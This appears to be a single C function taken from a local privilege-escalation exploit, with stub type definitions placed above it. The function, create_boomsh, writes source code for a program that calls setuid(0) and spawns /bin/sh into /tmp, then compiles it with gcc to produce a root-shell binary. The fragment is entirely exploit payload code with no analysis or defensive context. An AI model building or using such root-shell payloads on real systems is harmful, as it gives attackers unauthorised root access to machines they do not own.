
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int die (char*) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*) ;
 int printf (char*) ;
 int system (char*) ;

int create_boomsh()
{
 FILE *f = fopen("/tmp/boomsh.c", "w+");

 printf("Creating /tmp/boomsh\n");
 if (!f)
  die("fopen");
 fprintf(f, "#include <stdio.h>\nint main()\n{\nchar *a[]={\"/bin/sh\",0};"
     "setuid(0); execve(*a, a, NULL);return 1;}\n");
 fclose(f);
 system("gcc /tmp/boomsh.c -o /tmp/boomsh");
 return 0;
}
